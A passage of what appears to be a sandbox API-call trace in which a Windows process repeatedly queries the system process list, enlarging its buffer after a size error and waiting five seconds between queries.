BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.977] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.981] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.981] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.983] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.983] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.984] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.984] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.984] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.988] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.989] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.991] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.991] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.992] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.992] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.992] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.996] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.041] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.043] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.043] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.044] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.044] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.044] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.048] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.049] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.050] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.050] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.051] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.051] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.051] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.055] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.056] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.057] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.057] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.058] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.058] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.058] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.062] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.063] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.064] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.064] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.065] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.065] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.065] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.069] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.069] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.071] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.071] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.072] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.072] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.072] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.076] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.076] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.078] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.078] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.079] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.079] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.083] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.084] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.085] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.085] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.086] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.086] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.086] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.090] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.091] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.093] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.093] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.094] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.094] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.094] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.098] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.099] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.100] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.100] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.101] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.101] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.101] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.105] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.106] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.108] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.108] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.109] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.109] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.109] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.114] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.115] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.117] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.117] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.118] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.126] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.126] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.132] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.132] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.134] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.134] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.135] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.135] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.136] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.140] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.141] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.142] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.142] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.143] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.143] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.144] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.147] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.148] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.149] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.150] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.150] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.151] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.154] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.155] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.156] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.157] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.157] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.157] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.158] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.161] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.162] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.163] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.164] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.164] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.165] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.165] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.168] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.169] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.170] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.170] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.171] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.171] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.171] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.175] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.175] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.178] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.178] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.179] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.179] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.179] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.183] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.183] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.185] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.185] NtQuerySystemInformation (in: 